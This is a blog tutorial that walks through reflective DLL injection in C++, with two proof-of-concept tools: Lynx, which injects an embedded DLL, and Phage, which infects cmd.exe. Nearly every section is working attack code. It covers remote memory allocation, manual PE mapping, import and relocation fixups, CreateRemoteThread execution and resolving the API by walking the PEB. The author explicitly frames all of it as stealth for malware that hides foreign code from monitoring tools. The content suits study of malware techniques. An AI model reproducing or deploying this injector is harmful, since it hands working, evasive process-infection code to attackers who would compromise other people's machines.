Reflective DLL Injection

It’s been a while since I wrote something related to my development projects, let alone something malware-related. This is a concept that I devised (even though it already exists) while I was helping @fraq come up with stealth techniques for Windows machines. I’ve now completed a bare-minimum proof of concept, dubbed Lynx, and will present its inner workings at the code level and then demonstrate it. To keep this article short and on topic, I will not go over the topics listed in the prerequisites.

Disclaimer

The content provided is based entirely off my own research so if there is any incorrect information, I would like to sincerely apologise. If there is any feedback, please inform me and I will get to it as soon as I am able.

Required Skills

To fully understand the content of this article, you should be familiar with the following:

  • C/C++
  • Windows API
  • Virtual memory
  • PE file format
  • Dynamic-link Libraries

DLL Injection

What is DLL injection? DLL injection simply refers to the (forced) injection of a DLL into the address space of another process, followed by the execution of its code. The usual technique can be represented by the following snippet of code:

VOID InjectDll(HANDLE hProcess, LPCSTR lpszDllPath) {
	// error handling omitted for brevity
	// size of the path string, including the null terminator
	SIZE_T dwDllPathLen = strlen(lpszDllPath) + 1;
	SIZE_T dwWritten = 0;

	LPVOID lpBaseAddress = VirtualAllocEx(hProcess, NULL, dwDllPathLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

	WriteProcessMemory(hProcess, lpBaseAddress, lpszDllPath, dwDllPathLen, &dwWritten);

	HMODULE hModule = GetModuleHandleA("kernel32.dll");

	LPVOID lpStartAddress = (LPVOID)GetProcAddress(hModule, "LoadLibraryA");

	CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)lpStartAddress, lpBaseAddress, 0, NULL);
}

The first step is to allocate an area of memory in the virtual memory space of the target process which can be done with the VirtualAllocEx function, specifying the handle to the process. We can then use WriteProcessMemory to write data to the process by using the full path to the DLL payload. To execute the code, all we are required to do is to retrieve the LoadLibrary function from the kernel32 module and then call CreateRemoteThread to execute the LoadLibrary function within the target process to force load the DLL payload as a library. As a result of this loading, it will immediately execute the DLL’s DllMain entry point with the DLL_PROCESS_ATTACH reason.

Here is the example DLL code that I will be using for the demonstration to represent malicious code:

#include <Windows.h>

BOOL APIENTRY DllMain(HINSTANCE hInstance, DWORD fdwReason, LPVOID lpReserved) {
	::MessageBox(NULL, L"Hello world!", L"Test DLL", MB_OK);

	return TRUE;
}

Reflective DLL Injection

What makes Reflective DLL Injection different? Recall the previous DLL injection code and that the source of the DLL is obtained via its full path on disk. Because of this, it is not considered a very stealthy approach and also has an external dependency which may be problematic should it ever be separated. These issues can be addressed by using Reflective DLL Injection which allows the sourcing of the DLL in the form of its raw data. To be able to inject the data into the target process, we must manually parse and map the binary into the virtual memory as the Windows image loader would do when calling the LoadLibrary function from before. So let’s find out how this can be done.


Reflective DLL Injection Process

Here is a brief summary of the stages that will be undergone to map a DLL into an external process:

  1. The DLL payload must be retrieved,
  2. The DLL must then be mapped into memory,
  3. After mapping it to memory, its import table must be rebuilt,
  4. The base relocation table must be parsed to fix addresses due to the potential difference in image base,
  5. The mapped DLL is then written into the target process.

Extracting From Resources

To keep the DLL together with the injector as a single entity, we can take advantage of the PE format’s resource section.

Extracting the DLL’s raw binary is a trivial task which can be performed by using the resource API. Before extracting, we must check if a DLL exists in the resources like so:

BOOL CALLBACK EnumResNameProc(HMODULE hModule, LPCWSTR lpszType, LPWSTR lpszName, LONG_PTR lParam) {
	HRSRC *h = reinterpret_cast<HRSRC *>(lParam);
	HRSRC hRsrc = ::FindResource(hModule, lpszName, lpszType);
	// not found: keep enumerating
	if (!hRsrc) return TRUE;

	// found: save the handle and stop enumerating
	*h = hRsrc;
	return FALSE;
}

bool Injector::HasPayload() {
	// get own module
	HMODULE hModule = ::GetModuleHandle(NULL);
	if (!hModule) return false;

	// enumerate resources and select "PAYLOAD" type
	HRSRC hRsrc = NULL;
	if (!::EnumResourceNames(hModule, L"PAYLOAD", EnumResNameProc, reinterpret_cast<LPARAM>(&hRsrc)) && GetLastError() != ERROR_RESOURCE_ENUM_USER_STOP)
		return false;	// fail if no PAYLOAD resources are found

	if (!hRsrc) return false;

	this->payload->hResPayload = hRsrc;

	return true;
}

The above code will enumerate all of the resources of type PAYLOAD (there should only be one) and if it is successful, it will retrieve a handle to the resource by calling FindResource. Once we’ve obtained the handle, we can get a pointer to the raw binary data and copy it into memory using the following:

bool Injector::LoadFromResource() {
	// get resource size
	DWORD dwSize = ::SizeofResource(::GetModuleHandle(NULL), this->payload->hResPayload);
	// load resource
	HGLOBAL hResData = ::LoadResource(NULL, this->payload->hResPayload);
	if (hResData) {
		// get pointer to data
		LPVOID lpPayload = ::LockResource(hResData);
		if (lpPayload) {
			// save to vector
			if (MemoryMapPayload(lpPayload))
				return true;
		}
	}

	return false;
}

Keep in mind that after calling LockResource, the pointer to the DLL resource is read-only and the data is in its disk form, meaning that the offsets are all file offsets, not memory offsets.
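To make the file offset versus memory offset distinction concrete, here is a minimal, portable sketch that is not part of Lynx. It assumes the section table has already been read into a simple vector; SectionInfo and RvaToFileOffset are hypothetical names that mirror only the IMAGE_SECTION_HEADER fields needed for the translation.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

// Hypothetical stand-in for the IMAGE_SECTION_HEADER fields used here.
struct SectionInfo {
    std::uint32_t virtualAddress;    // RVA of the section once mapped
    std::uint32_t pointerToRawData;  // offset of the section's data in the file
    std::uint32_t sizeOfRawData;     // number of bytes stored in the file
};

// Translate an RVA (memory offset) into a file offset.
// Returns false when no section stores file data for that RVA.
bool RvaToFileOffset(const std::vector<SectionInfo>& sections,
                     std::uint32_t rva, std::uint32_t& fileOffset) {
    for (const SectionInfo& s : sections) {
        if (rva >= s.virtualAddress && rva - s.virtualAddress < s.sizeOfRawData) {
            fileOffset = s.pointerToRawData + (rva - s.virtualAddress);
            return true;
        }
    }
    return false;
}
```

With a section at RVA 0x1000 whose raw data starts at file offset 0x400, the RVA 0x1010 translates to file offset 0x410. RVAs that fall inside the headers are not covered by this sketch; those are the same in both forms.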

Mapping to Memory

We will need to convert it into its memory form for further processing which we can do by parsing its structures and mapping it to a memory space. The following code will achieve this:

bool Injector::MemoryMapPayload(LPVOID lpPayload) {
	// get DOS header
	PIMAGE_DOS_HEADER pidh = reinterpret_cast<PIMAGE_DOS_HEADER>(lpPayload);
	// get NT headers
	PIMAGE_NT_HEADERS pinh = reinterpret_cast<PIMAGE_NT_HEADERS>(reinterpret_cast<DWORD>(lpPayload) + pidh->e_lfanew);

    // get handle to mapping
	HANDLE hMapping = ::CreateFileMapping(INVALID_HANDLE_VALUE, NULL, PAGE_READWRITE, 0, pinh->OptionalHeader.SizeOfImage, NULL);
	if (hMapping) {
        // get a pointer to the mapped address
		LPVOID lpMapping = ::MapViewOfFile(hMapping, FILE_MAP_WRITE, 0, 0, 0);
		if (lpMapping) {
			// map payload to memory
			// copy headers
			::CopyMemory(lpMapping, lpPayload, pinh->OptionalHeader.SizeOfHeaders);
			// copy sections
			for (int i = 0; i < pinh->FileHeader.NumberOfSections; i++) {
				PIMAGE_SECTION_HEADER pish = reinterpret_cast<PIMAGE_SECTION_HEADER>(reinterpret_cast<DWORD>(lpPayload) + pidh->e_lfanew + sizeof(IMAGE_NT_HEADERS) + sizeof(IMAGE_SECTION_HEADER) * i);
				::CopyMemory(reinterpret_cast<LPVOID>(reinterpret_cast<DWORD>(lpMapping) + pish->VirtualAddress), reinterpret_cast<LPVOID>(reinterpret_cast<DWORD>(lpPayload) + pish->PointerToRawData), pish->SizeOfRawData);
			}
			this->vPayloadData = std::vector<BYTE>(reinterpret_cast<LPBYTE>(lpMapping), reinterpret_cast<LPBYTE>(lpMapping) + pinh->OptionalHeader.SizeOfImage);
			::UnmapViewOfFile(lpMapping);
			::CloseHandle(hMapping);
			return true;
		}
		::CloseHandle(hMapping);
	}

	return false;
}

Here, a region of memory is mapped so that we can transform the binary into its memory-mapped counterpart. The headers are copied first because they are laid out identically in the file on disk and in the memory image. Next, the section headers are enumerated to obtain the virtual address of each section, which determines where in the image its raw data is copied. Once the transformation is complete, we simply store the result and clean up the mapped memory.
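The same transformation can be sketched without any Windows API on plain byte buffers. This is only an illustration under assumptions, not the Lynx code: SectionLayout and ExpandToMemoryLayout are hypothetical names, and the header size, image size and section list are passed in rather than parsed from the PE headers.

```cpp
#include <algorithm>
#include <cassert>
#include <cstdint>
#include <vector>

// Hypothetical stand-in for the IMAGE_SECTION_HEADER fields used here.
struct SectionLayout {
    std::uint32_t virtualAddress;    // where the section lives in the image
    std::uint32_t pointerToRawData;  // where its bytes live in the file
    std::uint32_t sizeOfRawData;     // how many bytes to copy
};

// Build a zero-filled image of sizeOfImage bytes, copy the headers to the
// start, then copy each section's raw data to its virtual address.
std::vector<std::uint8_t> ExpandToMemoryLayout(const std::vector<std::uint8_t>& file,
                                               std::uint32_t sizeOfHeaders,
                                               std::uint32_t sizeOfImage,
                                               const std::vector<SectionLayout>& sections) {
    assert(sizeOfHeaders <= file.size() && sizeOfHeaders <= sizeOfImage);
    std::vector<std::uint8_t> image(sizeOfImage, 0);
    std::copy(file.begin(), file.begin() + sizeOfHeaders, image.begin());
    for (const SectionLayout& s : sections) {
        // Skip sections whose source or destination would fall outside the buffers.
        if (std::uint64_t(s.pointerToRawData) + s.sizeOfRawData > file.size()) continue;
        if (std::uint64_t(s.virtualAddress) + s.sizeOfRawData > image.size()) continue;
        std::copy(file.begin() + s.pointerToRawData,
                  file.begin() + s.pointerToRawData + s.sizeOfRawData,
                  image.begin() + s.virtualAddress);
    }
    return image;
}
```

The gaps between sections stay zero-filled, which is also what the mapped memory in the code above provides.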

Rebuilding and Injecting the DLL

Before we rebuild the DLL, we must first check if the target process exists, and if it does, retrieve the handle to it. We can do this by enumerating all of the running processes and then comparing their names:

bool Injector::GetProcess() {
	PROCESSENTRY32 pe32;
	pe32.dwSize = sizeof(PROCESSENTRY32);

	HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	if (hSnapshot == INVALID_HANDLE_VALUE)
		return false;

	if (Process32First(hSnapshot, &pe32)) {
		// do-while so that the first entry is checked as well
		do {
			// check process name
			if (_wcsicmp(pe32.szExeFile, this->szProcessName.c_str()) == 0) {
				// get handle to process
				HANDLE hProcess = OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION, FALSE, pe32.th32ProcessID);
				::CloseHandle(hSnapshot);
				if (!hProcess) return false;
				// save handle
				this->payload->hProcess = hProcess;
				return true;
			}
		} while (Process32Next(hSnapshot, &pe32));
	}

	// not found: release the snapshot handle
	::CloseHandle(hSnapshot);
	return false;
}

We are now able to check if we can allocate some memory in the target process’s address space. To achieve this, we can use the VirtualAllocEx function, specifying the handle to the process and the size of the image:

	// allocate space in target process
	this->payload->lpAddress = ::VirtualAllocEx(this->payload->hProcess, NULL, pinh->OptionalHeader.SizeOfImage, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	if (!this->payload->lpAddress)
		return Debug(L"Failed to allocate space: %lu\n", GetLastError()), false;

Once we’ve confirmed that there is available space, we can move onto rebuilding the DLL. Firstly, rebuilding the import table:

bool Injector::RebuildImportTable(LPVOID lpBaseAddress, PIMAGE_NT_HEADERS pinh) {
	// parse import table if size != 0
	if (pinh->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size) {
		// https://stackoverflow.com/questions/34086866/loading-an-executable-into-current-processs-memory-then-executing-it
		PIMAGE_IMPORT_DESCRIPTOR pImportDescriptor = reinterpret_cast<PIMAGE_IMPORT_DESCRIPTOR>(reinterpret_cast<DWORD>(lpBaseAddress) + pinh->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress);

		// Walk until you reached an empty IMAGE_IMPORT_DESCRIPTOR
		while (pImportDescriptor->Name != NULL) {
			// get the name of each DLL
			LPSTR lpLibrary = reinterpret_cast<PCHAR>(reinterpret_cast<DWORD>(lpBaseAddress) + pImportDescriptor->Name);

			HMODULE hLibModule = ::LoadLibraryA(lpLibrary);

			PIMAGE_THUNK_DATA nameRef = reinterpret_cast<PIMAGE_THUNK_DATA>(reinterpret_cast<DWORD>(lpBaseAddress) + pImportDescriptor->Characteristics);
			PIMAGE_THUNK_DATA symbolRef = reinterpret_cast<PIMAGE_THUNK_DATA>(reinterpret_cast<DWORD>(lpBaseAddress) + pImportDescriptor->FirstThunk);
			PIMAGE_THUNK_DATA lpThunk = reinterpret_cast<PIMAGE_THUNK_DATA>(reinterpret_cast<DWORD>(lpBaseAddress) + pImportDescriptor->FirstThunk);
			for (; nameRef->u1.AddressOfData; nameRef++, symbolRef++, lpThunk++) {
				// fix addresses
				// check if import by ordinal
				if (nameRef->u1.AddressOfData & IMAGE_ORDINAL_FLAG)
					*(FARPROC *)lpThunk = ::GetProcAddress(hLibModule, MAKEINTRESOURCEA(nameRef->u1.AddressOfData));
				else {
					PIMAGE_IMPORT_BY_NAME thunkData = reinterpret_cast<PIMAGE_IMPORT_BY_NAME>(reinterpret_cast<DWORD>(lpBaseAddress) + nameRef->u1.AddressOfData);
					*(FARPROC *)lpThunk = ::GetProcAddress(hLibModule, reinterpret_cast<LPCSTR>(&thunkData->Name));
				}
			}
			::FreeLibrary(hLibModule);
			// advance to next IMAGE_IMPORT_DESCRIPTOR
			pImportDescriptor++;
		}
	}

	return true;
}

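In short, the import table is located through the data directory of the Optional Header and then walked. For each imported library, the imported function names (or ordinals) are read and the corresponding FirstThunk entries are overwritten with the resolved addresses. Each address is resolved by loading the library with LoadLibrary and then calling GetProcAddress. Note that this resolution happens in the injector's own process, so it relies on the same libraries being loaded at the same base addresses in the target process.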
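The ordinal check in the loop above can be isolated into a small, portable sketch. It assumes 32-bit thunks, where the top bit (IMAGE_ORDINAL_FLAG32, 0x80000000) marks an import by ordinal and the low 16 bits hold the ordinal; otherwise the value is the RVA of an IMAGE_IMPORT_BY_NAME structure. ImportRef and ClassifyThunk32 are hypothetical names for illustration.

```cpp
#include <cassert>
#include <cstdint>

// Same value as IMAGE_ORDINAL_FLAG32 in the Windows headers.
constexpr std::uint32_t kOrdinalFlag32 = 0x80000000u;

// Hypothetical result type describing one 32-bit import thunk.
struct ImportRef {
    bool byOrdinal;          // true when the import is identified by ordinal
    std::uint16_t ordinal;   // valid only when byOrdinal is true
    std::uint32_t nameRva;   // RVA of IMAGE_IMPORT_BY_NAME when byOrdinal is false
};

ImportRef ClassifyThunk32(std::uint32_t thunk) {
    ImportRef ref{};
    if (thunk & kOrdinalFlag32) {
        ref.byOrdinal = true;
        ref.ordinal = static_cast<std::uint16_t>(thunk & 0xFFFFu);
    } else {
        ref.byOrdinal = false;
        ref.nameRva = thunk;
    }
    return ref;
}
```

For a by-name import, the name string itself starts two bytes after nameRva because IMAGE_IMPORT_BY_NAME begins with a 16-bit Hint field.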

The next step is to relocate addresses using the base relocation table. The delta is the difference between the base address actually allocated in the target process and the preferred image base recorded in the headers, calculated with a simple subtraction:

DWORD dwDelta = reinterpret_cast<DWORD>(this->payload->lpAddress) - pinh->OptionalHeader.ImageBase;

As with the import table, the relocation table is walked, and the calculated delta is added to each address that it lists:

bool Injector::BaseRelocate(LPVOID lpBaseAddress, PIMAGE_NT_HEADERS pinh, DWORD dwDelta) {
	IMAGE_BASE_RELOCATION *r = reinterpret_cast<IMAGE_BASE_RELOCATION *>(reinterpret_cast<DWORD>(lpBaseAddress) + pinh->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); //The address of the first I_B_R struct 
	IMAGE_BASE_RELOCATION *r_end = reinterpret_cast<IMAGE_BASE_RELOCATION *>(reinterpret_cast<DWORD_PTR>(r) + pinh->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size - sizeof(IMAGE_BASE_RELOCATION)); //The addr of the last
	for (; r < r_end; r = reinterpret_cast<IMAGE_BASE_RELOCATION *>(reinterpret_cast<DWORD_PTR>(r) + r->SizeOfBlock)) {
		WORD *reloc_item = reinterpret_cast<WORD *>(r + 1);
		DWORD num_items = (r->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD);

		for (DWORD i = 0; i < num_items; ++i, ++reloc_item) {
			switch (*reloc_item >> 12) {
				case IMAGE_REL_BASED_ABSOLUTE:
					break;
				case IMAGE_REL_BASED_HIGHLOW:
					*(DWORD_PTR *)(reinterpret_cast<DWORD>(lpBaseAddress) + r->VirtualAddress + (*reloc_item & 0xFFF)) += dwDelta;
					break;
				default:
					return false;
			}
		}
	}

	return true;
}
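To show what a single relocation entry encodes, here is a portable sketch that works on a plain byte buffer instead of a mapped image. Each 16-bit entry holds the type in its top 4 bits and an offset within the block's page in the low 12 bits. The names RelocEntry, DecodeRelocEntry and ApplyRelocBlock are hypothetical; the type values 0 and 3 match IMAGE_REL_BASED_ABSOLUTE and IMAGE_REL_BASED_HIGHLOW.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

constexpr std::uint16_t kRelBasedAbsolute = 0;  // padding entry, nothing to fix
constexpr std::uint16_t kRelBasedHighLow  = 3;  // 32-bit absolute address

struct RelocEntry {
    std::uint16_t type;    // top 4 bits of the raw entry
    std::uint16_t offset;  // low 12 bits: offset from the block's page RVA
};

RelocEntry DecodeRelocEntry(std::uint16_t raw) {
    return RelocEntry{static_cast<std::uint16_t>(raw >> 12),
                      static_cast<std::uint16_t>(raw & 0x0FFF)};
}

// Apply the entries of one relocation block to an in-memory image.
// pageRva corresponds to the block's VirtualAddress field.
bool ApplyRelocBlock(std::vector<std::uint8_t>& image, std::uint32_t pageRva,
                     const std::vector<std::uint16_t>& entries, std::uint32_t delta) {
    for (std::uint16_t raw : entries) {
        RelocEntry e = DecodeRelocEntry(raw);
        if (e.type == kRelBasedAbsolute) continue;
        if (e.type != kRelBasedHighLow) return false;  // unsupported in this sketch
        std::size_t pos = static_cast<std::size_t>(pageRva) + e.offset;
        if (pos + sizeof(std::uint32_t) > image.size()) return false;
        std::uint32_t value;
        std::memcpy(&value, &image[pos], sizeof(value));
        value += delta;  // unsigned wrap-around also covers a lower new base
        std::memcpy(&image[pos], &value, sizeof(value));
    }
    return true;
}
```

For example, an image with a preferred base of 0x10000000 that ends up at 0x00500000 turns a stored address of 0x10001234 into 0x00501234.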

Now that the image has been rebuilt and memory has been allocated in the external process, we can simply write the entire image into it using WriteProcessMemory:

if (!::WriteProcessMemory(this->payload->hProcess, this->payload->lpAddress, this->vPayloadData.data(), pinh->OptionalHeader.SizeOfImage, NULL))
	return Debug(L"Failed to write payload: %lu\n", GetLastError()), false;

Easy, right?

Executing the DLL

Execution is almost the same as with normal DLL injection, using a call to CreateRemoteThread. The only difference here is that instead of LoadLibrary, we use the DLL's entry point address directly, which is, or leads to, the DllMain entry point.

// entry point is the base address + the AddressOfEntryPoint value
this->payload->dwEntryPoint = reinterpret_cast<DWORD>(this->payload->lpAddress) + pinh->OptionalHeader.AddressOfEntryPoint;

HANDLE hThread = ::CreateRemoteThread(this->payload->hProcess, NULL, 0, reinterpret_cast<LPTHREAD_START_ROUTINE>(payload->dwEntryPoint), NULL, 0, NULL);

And that’s it!


Demonstration

In this demonstration, I will be using putty.exe as the target. I can’t use explorer.exe because it is a 64-bit process, whereas my injector and DLL are 32-bit, and I don’t have a 32-bit VM anywhere. I will also be using the Process Hacker monitoring tool to look for any forensic evidence left by the DLL injection.

Normal DLL Injection

Here is the result of the normal DLL injection method:

We can see that it shows up clearly on the list of loaded modules and is a very obvious giveaway that there is foreign code in the affected process.

Reflective DLL Injection

Let’s now check out the reflective DLL injection method:

And here, there is no name for that block of memory space. Besides the RWX permissions (which can easily be fixed but remember that this is a PoC), there are no obvious signs that there exists any foreign code! Pretty neat, huh?


Addressing Some Issues

As a small addition to the article, there are problems which may be encountered when executing in the space of another process. While this example DLL may work in many processes, it is only guaranteed to work in those which have already loaded user32.dll, as the only function it uses is MessageBox. Many GUI applications on Windows import user32.dll because it is required to create graphical components.

Suppose that, instead of the example DLL, we wanted to use something more complex that depends on multiple libraries which may or may not be loaded by the target process, for example, a console application. In that case, calling a function whose library is absent from the target process will very likely cause an access violation, as execution may land in unmapped or non-executable memory, and the process will crash. So how could we solve this issue?

Dynamically Retrieving Functions

One solution is to resolve the required API before executing the main payload, using the classic LoadLibrary and GetProcAddress combination to load libraries into the process space and then retrieve the addresses of the desired functions. I will explain it only briefly because I’ve already detailed it in another thread. Essentially, we find the image base of the kernel32.dll module, which is loaded in every process because it provides crucial functions required to initialise the program. Once the module base has been obtained, its export table is found and walked, comparing the name of each exported function against the ones we need; on a match, the function's address can be read from the table. This gives us LoadLibrary and GetProcAddress, and with these two addresses it is possible to load more libraries into the process and find the address of any function that they export. Let’s see how this is done.

void InitialiseFunctions(void) {
	HMODULE hKernel32Mod = NULL;
	__asm {
		pushad
		mov		eax, fs:[0x30]
		mov		eax, [eax + 0x0C]
		mov		eax, [eax + 0x14]
		mov		eax, [eax]
		mov		eax, [eax]
		mov		eax, [eax + 0x10]
		mov		hKernel32Mod, eax
		popad
	}

	// get DOS header
	PIMAGE_DOS_HEADER pidh = (PIMAGE_DOS_HEADER)(hKernel32Mod);
	// get NT headers
	PIMAGE_NT_HEADERS pinh = (PIMAGE_NT_HEADERS)((DWORD)hKernel32Mod + pidh->e_lfanew);
	// find eat
	PIMAGE_EXPORT_DIRECTORY pied = (PIMAGE_EXPORT_DIRECTORY)((DWORD)hKernel32Mod + pinh->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);

	// find functions
	LPDWORD dwAddresses = (LPDWORD)((DWORD)hKernel32Mod + pied->AddressOfFunctions);
	LPDWORD dwNames = (LPDWORD)((DWORD)hKernel32Mod + pied->AddressOfNames);
	LPWORD wOrdinals = (LPWORD)((DWORD)hKernel32Mod + pied->AddressOfNameOrdinals);

	// loop through all names of functions and select LoadLibrary and GetProcAddress
	for (int i = 0; i < pied->NumberOfNames; i++) {
		LPCSTR lpName = (LPCSTR)((DWORD)hKernel32Mod + dwNames[i]);
		if (!strcmp(lpName, "LoadLibraryA"))
			fnLoadLibraryA = (pfnLoadLibraryA)((DWORD)hKernel32Mod + dwAddresses[wOrdinals[i]]);
		else if (!strcmp(lpName, "GetProcAddress"))
			fnGetProcAddress = (pfnGetProcAddress)((DWORD)hKernel32Mod + dwAddresses[wOrdinals[i]]);
	}

	// load libraries
	HMODULE hUser32Mod = fnLoadLibraryA("user32.dll");
	HMODULE hShlwapiMod = fnLoadLibraryA("shlwapi.dll");

	// kernel32
	// functions to reinfect another process
	fnCreateToolhelp32Snapshot = (pfnCreateToolhelp32Snapshot)fnGetProcAddress(hKernel32Mod, "CreateToolhelp32Snapshot");
	fnProcess32FirstW = (pfnProcess32FirstW)fnGetProcAddress(hKernel32Mod, "Process32FirstW");
	fnProcess32NextW = (pfnProcess32NextW)fnGetProcAddress(hKernel32Mod, "Process32NextW");
	fnOpenProcess = (pfnOpenProcess)fnGetProcAddress(hKernel32Mod, "OpenProcess");
	fnCloseHandle = (pfnCloseHandle)fnGetProcAddress(hKernel32Mod, "CloseHandle");
	fnIsWow64Process = (pfnIsWow64Process)fnGetProcAddress(hKernel32Mod, "IsWow64Process");
	fnGetProcessHeap = (pfnGetProcessHeap)fnGetProcAddress(hKernel32Mod, "GetProcessHeap");
	fnHeapAlloc = (pfnHeapAlloc)fnGetProcAddress(hKernel32Mod, "HeapAlloc");
	fnGetModuleFileNameW = (pfnGetModuleFileNameW)fnGetProcAddress(hKernel32Mod, "GetModuleFileNameW");
	fnVirtualAllocEx = (pfnVirtualAllocEx)fnGetProcAddress(hKernel32Mod, "VirtualAllocEx");
	fnWriteProcessMemory = (pfnWriteProcessMemory)fnGetProcAddress(hKernel32Mod, "WriteProcessMemory");
	fnCreateRemoteThread = (pfnCreateRemoteThread)fnGetProcAddress(hKernel32Mod, "CreateRemoteThread");
	fnHeapFree = (pfnHeapFree)fnGetProcAddress(hKernel32Mod, "HeapFree");
	fnGetLastError = (pfnGetLastError)fnGetProcAddress(hKernel32Mod, "GetLastError");
	fnExitProcess = (pfnExitProcess)fnGetProcAddress(hKernel32Mod, "ExitProcess");
	fnGetNativeSystemInfo = (pfnGetNativeSystemInfo)fnGetProcAddress(hKernel32Mod, "GetNativeSystemInfo");
	// functions for payload
	fnWaitForSingleObject = (pfnWaitForSingleObject)fnGetProcAddress(hKernel32Mod, "WaitForSingleObject");
	fnGetModuleHandleW = (pfnGetModuleHandleW)fnGetProcAddress(hKernel32Mod, "GetModuleHandleW");
	fnCreateProcessW = (pfnCreateProcessW)fnGetProcAddress(hKernel32Mod, "CreateProcessW");

	// shlwapi
	fnStrStrIW = (pfnStrStrIW)fnGetProcAddress(hShlwapiMod, "StrStrIW");

	// user32
	// debugging functions
#ifdef _DEBUG
	fnwvsprintfW = (pfnwvsprintfW)fnGetProcAddress(hUser32Mod, "wvsprintfW");
	fnMessageBoxW = (pfnMessageBoxW)fnGetProcAddress(hUser32Mod, "MessageBoxW");
#endif // _DEBUG

}

The inline assembly at the start retrieves the image base of the kernel32.dll library. It finds the PEB of the process through fs:[0x30], follows it to the loader data and then walks the InMemoryOrderModuleList until it reaches the third entry. In practice, this list starts with the main executable itself, followed by ntdll.dll and then kernel32.dll, although this ordering is not a documented guarantee. Because the list pointers point at the InMemoryOrderLinks member rather than at the start of the entry, the DllBase member is at a 0x10 offset from that pointer, as the relevant part of the structure shows:

typedef struct _LDR_DATA_TABLE_ENTRY {
    // unnecessary members omitted
    LIST_ENTRY InMemoryOrderLinks;    // offset 0; size 8
    PVOID Reserved2[2];               // offset 8; size 8
    PVOID DllBase;                    // offset 16
    // unnecessary members omitted
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
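The 0x10 offset can be double-checked with a small, portable sketch. It models the 32-bit layout with fixed-width fields, following the member names documented in winternl.h (Reserved1, InMemoryOrderLinks, Reserved2, DllBase); ListEntry32, LdrDataTableEntry32 and DllBaseOffsetFromLinks are hypothetical names, and the model only covers the leading members.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>

// 32-bit LIST_ENTRY: two 4-byte pointers.
struct ListEntry32 {
    std::uint32_t Flink;
    std::uint32_t Blink;
};

// Leading members of the 32-bit LDR_DATA_TABLE_ENTRY, pointers modelled as
// 32-bit integers so the layout is the same on any build platform.
struct LdrDataTableEntry32 {
    std::uint32_t Reserved1[2];      // offset 0x00
    ListEntry32 InMemoryOrderLinks;  // offset 0x08
    std::uint32_t Reserved2[2];      // offset 0x10
    std::uint32_t DllBase;           // offset 0x18
};

static_assert(offsetof(LdrDataTableEntry32, InMemoryOrderLinks) == 0x08,
              "list links start 8 bytes into the entry");
static_assert(offsetof(LdrDataTableEntry32, DllBase) == 0x18,
              "DllBase is 0x18 bytes from the start of the entry");

// Distance from the list link (what the walked pointer refers to) to DllBase.
constexpr std::size_t DllBaseOffsetFromLinks() {
    return offsetof(LdrDataTableEntry32, DllBase) -
           offsetof(LdrDataTableEntry32, InMemoryOrderLinks);
}
```

DllBaseOffsetFromLinks() evaluates to 0x10, which matches the [eax + 0x10] read in the assembly.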

After this, the export table is located and pointed to by pied, which is then used to find the arrays that hold the names, ordinals and function addresses. We can use a loop to iterate through all of the exported names (they are in alphabetical order) to match and retrieve LoadLibraryA and GetProcAddress. These two functions are then used to load the required libraries and resolve their functions.
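The relationship between the three export arrays can be sketched portably with mock data. The code above scans the names linearly; since the names are sorted, this sketch swaps in a binary search instead. ExportTables and FindExportRva are hypothetical names, and the vectors stand in for the arrays behind AddressOfNames, AddressOfNameOrdinals and AddressOfFunctions.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>
#include <vector>

// Hypothetical in-memory model of the three export arrays.
struct ExportTables {
    std::vector<const char*> names;           // sorted export names
    std::vector<std::uint16_t> nameOrdinals;  // parallel to names: index into functions
    std::vector<std::uint32_t> functions;     // function RVAs
};

// Return the RVA of the named export, or 0 when it is not present.
std::uint32_t FindExportRva(const ExportTables& t, const char* wanted) {
    std::size_t lo = 0;
    std::size_t hi = t.names.size();
    while (lo < hi) {
        std::size_t mid = lo + (hi - lo) / 2;
        int cmp = std::strcmp(t.names[mid], wanted);
        if (cmp == 0) {
            // The name's position selects an ordinal index, which in turn
            // selects the function RVA.
            std::uint16_t index = t.nameOrdinals[mid];
            return index < t.functions.size() ? t.functions[index] : 0;
        }
        if (cmp < 0) lo = mid + 1; else hi = mid;
    }
    return 0;
}
```

The important detail is the double lookup: the position of the name is not the position of the address, which is why the code above indexes dwAddresses with wOrdinals[i] rather than with i.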

Now we can execute the payload.

Demonstration

The following demonstration shows another PoC program, which I named Phage: an executable that uses the reflective DLL injection-style method to infect another process (and hence does not rely on a DLL). Here I have chosen to infect cmd.exe under 32-bit Windows 7 (to prove that the dynamically retrieved API works) and disable a particular feature.

Let’s look at the process’s initial memory space and what libraries are present by default:

and then here it is infected:

Firstly, Phage has placed itself in the memory address 0x1580000. We can also see at the bottom of the list of stacked DLLs there is the loaded Shlwapi.dll library which was defined in the above code. The imported function StrStrIW is used in the payload to filter out certain parameters under a feature which I have impaired as seen here:

Whenever the infected process tries to start a process which has a .exe in its name, it will be denied.


Conclusion

Reflective DLL injection is just the emulation of the Windows image loader to map and execute a DLL into another process’s address space which can remain hidden due to the lack of obvious information provided by monitoring tools.

LoadLibrary versus manual injection? Both have their advantages and disadvantages. For example, LoadLibrary provides a much more elegant injection that properly calls the DllMain entry point with the correct arguments. With my approach, on the other hand, I don’t know how to supply those arguments, which means the payload may not be able to rely on the fdwReason parameter to run code only under the right circumstances and hence may fire off code multiple times undesirably. There might be a way to do it but I do not know of it.

